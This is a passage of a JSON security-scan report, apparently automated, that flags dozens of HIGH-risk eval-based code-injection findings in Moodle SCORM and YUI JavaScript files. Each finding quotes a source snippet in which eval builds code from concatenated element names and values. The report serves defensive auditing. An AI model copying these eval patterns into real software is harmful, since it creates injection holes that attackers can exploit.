"positionInEndLine": 44, "startLineNumber": 153, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " subelement = subelement.concat('.' + elementIndex);\n }\n if ((typeof eval(subelement)) == \"undefined\") {\n eval(subelement + ' = new Object();');\n if (subelement.substr(0,14) == 'cmi.objectives') {\n eval(subelement + '.score = new Object();');\n eval(subelement + '.score._children = score_children;');\n eval(subelement + '.score.raw = \"\";');\n eval(subelement + '.score.min = \"\";');\n eval(subelement + '.score.max = \"\";');\n }\n", "vulnerId": "APPCUT:62:14266", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 338, "positionInEndLine": 87, "startLineNumber": 338, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " }\n break;\n case 'cmi.interactions.n.objectives.n.id':\n if (typeof eval(parentelement) != \"undefined\") {\n if (!duplicatedID(element,parentelement,value)) {\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n eval(parentelement + '._count++;');\n eval(subelement + ' = new Object();');\n }\n } else {\n errorCode = \"351\";\n", "vulnerId": "APPCUT:62:14261", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 109, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 562, "positionInEndLine": 136, "startLineNumber": 562, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}]}, {"pageNumber": 7, "vulnerabilities": [{"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " }\n } else {\n // append the URI fragment to the string we plan to commit\n datastring += elementstring;\n // no default value for the element, so set it now\n eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue=data[property];');\n }\n }\n }\n }\n }\n", "vulnerId": "APPCUT:62:14334", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 36, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 593, "positionInEndLine": 114, "startLineNumber": 593, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/yuilib/2in3/2.9.0/build/yui2-yuiloader/yui2-yuiloader.js", "code": " var t = \"(function() {\\n\";\n\n // return the locally scoped reference.\n var b = \"\\nreturn \" + v + \";\\n})();\";\n\n var ref = eval(t + self._scriptText.join(\"\\n\") + b);\n\n self._pushEvents(ref);\n\n if (ref) {\n self.onSuccess.call(self.scope, {\n", "vulnerId": "APPCUT:62:14339", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 38, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 3789, "positionInEndLine": 75, "startLineNumber": 3789, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " errorCode = \"351\";\n }\n }\n }\n if ((typeof correct_responses[interactiontype].limit == 'undefined') ||\n (eval(parentelement + '._count') < correct_responses[interactiontype].limit)) {\n var nodes = new Array();\n if (correct_responses[interactiontype].delimiter != '') {\n nodes = value.split(correct_responses[interactiontype].delimiter);\n } else {\n nodes[0] = value;\n", "vulnerId": "APPCUT:62:14326", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 65, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 589, "positionInEndLine": 93, "startLineNumber": 589, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " if ((typeof eval(subelement)) == \"undefined\") {\n eval(subelement + ' = new Object();');\n if (subelement.substr(0,14) == 'cmi.objectives') {\n eval(subelement + '.score = new Object();');\n eval(subelement + '.score._children = score_children;');\n eval(subelement + '.score.raw = \"\";');\n eval(subelement + '.score.min = \"\";');\n eval(subelement + '.score.max = \"\";');\n }\n if (subelement.substr(0,16) == 'cmi.interactions') {\n eval(subelement + '.objectives = new Object();');\n", "vulnerId": "APPCUT:62:14331", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 340, "positionInEndLine": 81, "startLineNumber": 340, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " } else {\n errorCode = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].writeerror');\n }\n } else {\n if (element == 'cmi.comments') {\n eval(element + '+=\"' + value + '\";');\n } else {\n eval(element + '=\"' + value + '\";');\n }\n errorCode = \"0\";\n return \"true\";\n", "vulnerId": "APPCUT:62:14332", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 44, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 355, "positionInEndLine": 76, "startLineNumber": 355, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " // Navigation Object\n nav = new Object();\n\n for (element in datamodel[scoid]) {\n if (element.match(/\\.n\\./) == null) {\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue')) != 'undefined') {\n eval(element + ' = datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue;');\n } else {\n eval(element + ' = \"\";');\n }\n }\n", "vulnerId": "APPCUT:62:14337", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 32, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 158, "positionInEndLine": 94, "startLineNumber": 158, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " case 'cmi.interactions.n.correct_responses.n.pattern':\n if (typeof eval(parentelement) != \"undefined\") {\n // Use cmi.interactions.n.type value to check the right dataelement format\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n var interactiontype = eval(String(parentelement).replace('correct_responses','type'));\n var interactioncount = eval(parentelement + '._count');\n // trap duplicate values, which is not allowed for type choice\n if (interactiontype == 'choice') {\n for (var i = 0; (i < interactioncount) && (errorCode == \"0\"); i++) {\n if (eval(parentelement + '.N' + i + '.pattern') == value) {\n errorCode = \"351\";\n", "vulnerId": "APPCUT:62:14333", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 83, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 579, "positionInEndLine": 110, "startLineNumber": 579, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " diagnostic = \"Data Model Element Pattern Too Long\";\n }\n if ((errorCode == \"0\") && ((correct_responses[interactiontype].duplicate == false) ||\n (!duplicatedPA(element,parentelement,value))) || (errorCode == \"0\" && value == \"\")) {\n eval(parentelement + '._count++;');\n eval(subelement + ' = new Object();');\n } else {\n if (errorCode == \"0\") {\n errorCode = \"351\";\n diagnostic = \"Data Model Element Pattern Already Exists\";\n }\n", "vulnerId": "APPCUT:62:14325", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 67, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 605, "positionInEndLine": 100, "startLineNumber": 605, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " errorCode = \"351\";\n diagnostic = \"Data Model Element ID Already Exists\";\n }\n break;\n case 'cmi.interactions.n.id':\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n eval(parentelement + '._count++;');\n eval(subelement + ' = new Object();');\n var subobject = eval(subelement);\n subobject.objectives = new Object();\n subobject.objectives._count = 0;\n", "vulnerId": "APPCUT:62:14336", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 101, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 551, "positionInEndLine": 128, "startLineNumber": 551, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " if ((Initialized) && (!Terminated)) {\n if (element != \"\") {\n var expression = new RegExp(CMIIndex,'g');\n var elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'r') {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].format') != 'CMIFeedback') {\n expression = new RegExp(eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].format'));\n } else {\n // cmi.interactions.n.type depending format accept everything at this stage\n expression = new RegExp(CMIFeedback);\n", "vulnerId": "APPCUT:62:14330", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 28, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 477, "positionInEndLine": 87, "startLineNumber": 477, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " if (Initialized) {\n if (element != \"\") {\n expression = new RegExp(CMIIndex,'g');\n elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'w') {\n element = String(element).replace(expression, \"_$1.\");\n elementIndexes = element.split('.');\n subelement = 'cmi';\n i = 1;\n while ((i < elementIndexes.length) && (typeof eval(subelement) != \"undefined\")) {\n", "vulnerId": "APPCUT:62:14329", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 28, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 237, "positionInEndLine": 87, "startLineNumber": 237, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " // Navigation Object\n nav = new Object();\n\n for (element in datamodel[scoid]) {\n if (element.match(/\\.n\\./) == null) {\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue')) != 'undefined') {\n eval(element + ' = datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue;');\n } else {\n eval(element + ' = \"\";');\n }\n }\n", "vulnerId": "APPCUT:62:14328", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 32, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 150, "positionInEndLine": 94, "startLineNumber": 150, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " subelement = subelement.concat('.' + elementIndex + '_' + elementIndexes[i + 1]);\n i++;\n } else {\n subelement = subelement.concat('.' + elementIndex);\n }\n if ((typeof eval(subelement)) == \"undefined\") {\n eval(subelement + ' = new Object();');\n if (subelement.substr(0,14) == 'cmi.objectives') {\n eval(subelement + '.score = new Object();');\n eval(subelement + '.score._children = score_children;');\n eval(subelement + '.score.raw = \"\";');\n", "vulnerId": "APPCUT:62:14327", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 52, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 335, "positionInEndLine": 64, "startLineNumber": 335, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " if ((parseInt(elementIndexes[i + 1]) > 0) && (elementIndexes[i + 1].charAt(0) == 0)) {\n // Index has a leading 0 (zero), this is not a number\n errorCode = \"351\";\n }\n parentelement = subelement + '.' + elementIndex;\n if ((typeof eval(parentelement) == \"undefined\") || (typeof eval(parentelement + '._count') == \"undefined\")) {\n errorCode = \"408\";\n } else {\n if (elementIndexes[i + 1] > eval(parentelement + '._count')) {\n errorCode = \"351\";\n diagnostic = \"Data Model Element Collection Set Out Of Order\";\n", "vulnerId": "APPCUT:62:14335", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 103, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 503, "positionInEndLine": 131, "startLineNumber": 503, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " subelement += '.' + elementIndexes[i++];\n }\n\n if (subelement == element) {\n\n if ((typeof eval(subelement) != \"undefined\") && (eval(subelement) != null)) {\n errorCode = \"0\";\n if (scormdebugging) {\n LogAPICall(\"GetValue\", element, eval(element), 0);\n }\n return eval(element);\n", "vulnerId": "APPCUT:62:14338", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 81, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 398, "positionInEndLine": 94, "startLineNumber": 398, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}]}, {"pageNumber": 8, "vulnerabilities": [{"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " eval(subelement + '.score.min = \"\";');\n eval(subelement + '.score.max = \"\";');\n }\n if (subelement.substr(0,16) == 'cmi.interactions') {\n eval(subelement + '.objectives = new Object();');\n eval(subelement + '.objectives._count = 0;');\n eval(subelement + '.correct_responses = new Object();');\n eval(subelement + '.correct_responses._count = 0;');\n }\n }\n }\n", "vulnerId": "APPCUT:62:14348", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 346, "positionInEndLine": 88, "startLineNumber": 346, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " }\n if (subelement.substr(0,16) == 'cmi.interactions') {\n eval(subelement + '.objectives = new Object();');\n eval(subelement + '.objectives._count = 0;');\n eval(subelement + '.correct_responses = new Object();');\n eval(subelement + '.correct_responses._count = 0;');\n }\n }\n }\n element = subelement.concat('.' + elementIndexes[elementIndexes.length - 1]);\n }\n", "vulnerId": "APPCUT:62:14352", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 331, "positionInEndLine": 95, "startLineNumber": 331, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " element = element.replace(/\\.(\\d+)\\./, \".N$1.\");\n\n var elementIndexes = element.split('.');\n var subelement = element.substr(0,3);\n var i = 1;\n while ((i < elementIndexes.length) && (typeof eval(subelement) != \"undefined\")) {\n subelement += '.' + elementIndexes[i++];\n }\n\n if (subelement == element) {\n\n", "vulnerId": "APPCUT:62:14351", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 74, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 392, "positionInEndLine": 87, "startLineNumber": 392, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": "\n function duplicatedID (element, parent, value) {\n var found = false;\n var elements = eval(parent + '._count');\n for (var n = 0; (n < elements) && (!found); n++) {\n if ((parent + '.N' + n + '.id' != element) && (eval(parent + '.N' + n + '.id') == value)) {\n found = true;\n }\n }\n return found;\n }\n", "vulnerId": "APPCUT:62:14345", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 63, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 1071, "positionInEndLine": 91, "startLineNumber": 1071, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " if ((typeof eval(subelement)) == \"undefined\") {\n switch (elementmodel) {\n case 'cmi.objectives.n.id':\n if (!duplicatedID(element,parentelement,value)) {\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n eval(parentelement + '._count++;');\n eval(subelement + ' = new Object();');\n var subobject = eval(subelement);\n subobject.success_status = datamodel[scoid][\"cmi.objectives.n.success_status\"].defaultvalue;\n subobject.completion_status = datamodel[scoid][\"cmi.objectives.n.completion_status\"].defaultvalue;\n subobject.progress_measure = datamodel[scoid][\"cmi.objectives.n.progress_measure\"].defaultvalue;\n", "vulnerId": "APPCUT:62:14342", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 60, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 532, "positionInEndLine": 90, "startLineNumber": 532, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " errorCode = \"0\";\n return \"true\";\n }\n }\n } else {\n errorCode = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].writeerror');\n }\n } else {\n errorCode = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].writeerror');\n }\n } else {\n", "vulnerId": "APPCUT:62:14349", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 44, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 364, "positionInEndLine": 109, "startLineNumber": 364, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " eval(subelement + '.score.raw = \"\";');\n eval(subelement + '.score.min = \"\";');\n eval(subelement + '.score.max = \"\";');\n }\n if (subelement.substr(0,16) == 'cmi.interactions') {\n eval(subelement + '.objectives = new Object();');\n eval(subelement + '.objectives._count = 0;');\n eval(subelement + '.correct_responses = new Object();');\n eval(subelement + '.correct_responses._count = 0;');\n }\n }\n", "vulnerId": "APPCUT:62:14344", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 328, "positionInEndLine": 92, "startLineNumber": 328, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": "\n // check if the element has a default value\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue')) != \"undefined\") {\n\n // check if the default value is different from the current value\n if (eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue') != data[property]\n || eval('typeof(datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue)') != typeof(data[property])) {\n\n // append the URI fragment to the string we plan to commit\n datastring += elementstring;\n\n", "vulnerId": "APPCUT:62:14347", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 40, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 580, "positionInEndLine": 103, "startLineNumber": 580, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " if ((Initialized) && (!Terminated)) {\n if (element != \"\") {\n var expression = new RegExp(CMIIndex,'g');\n var elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'w') {\n\n element = String(element).replace(/\\.(\\d+)\\./, \".N$1.\");\n element = element.replace(/\\.(\\d+)\\./, \".N$1.\");\n\n var elementIndexes = element.split('.');\n", "vulnerId": "APPCUT:62:14341", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 28, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 384, "positionInEndLine": 87, "startLineNumber": 384, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " return eval(element);\n } else {\n errorCode = \"0\"; // Need to check if it is the right errorCode\n }\n } else {\n errorCode = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].readerror');\n }\n } else {\n childrenstr = '._children';\n countstr = '._count';\n if (elementmodel.substr(elementmodel.length - childrenstr.length,elementmodel.length) == childrenstr) {\n", "vulnerId": "APPCUT:62:14343", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 40, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 252, "positionInEndLine": 104, "startLineNumber": 252, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/yuilib/2in3/2.9.0/build/yui2-datasource/yui2-datasource.js", "code": " var objEnd = Math.max(oFullResponse.lastIndexOf(\"]\"),oFullResponse.lastIndexOf(\"}\"));\n oFullResponse = oFullResponse.substring(0,objEnd+1);\n \n // Turn the string into an object literal...\n // ...eval is necessary here\n oFullResponse = eval(\"(\" + oFullResponse + \")\");\n \n }\n }\n }\n }\n", "vulnerId": "APPCUT:62:14340", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 1114, "positionInEndLine": 75, "startLineNumber": 1114, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " }\n break;\n default:\n if ((parentelement != 'cmi.objectives') && (parentelement != 'cmi.interactions') && (typeof eval(parentelement) != \"undefined\")) {\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n eval(parentelement + '._count++;');\n eval(subelement + ' = new Object();');\n } else {\n errorCode = \"351\";\n diagnostic = \"Data Model Element Collection Set Out Of Order\";\n }\n", "vulnerId": "APPCUT:62:14350", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 60, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 627, "positionInEndLine": 90, "startLineNumber": 627, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " }\n datastring += TotalTime();\n }\n datastring += CollectData(data,'cmi');\n var element = 'adl.nav.request';\n var navrequest = eval(element) != datamodel[scoid][element].defaultvalue ? '&' + underscore(element) + '=' + encodeURIComponent(eval(element)) : '';\n datastring += navrequest;\n\n var myRequest = NewHttpReq();\n result = DoRequest(myRequest, datamodelurl, datamodelurlparams + datastring);\n\n", "vulnerId": "APPCUT:62:14354", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 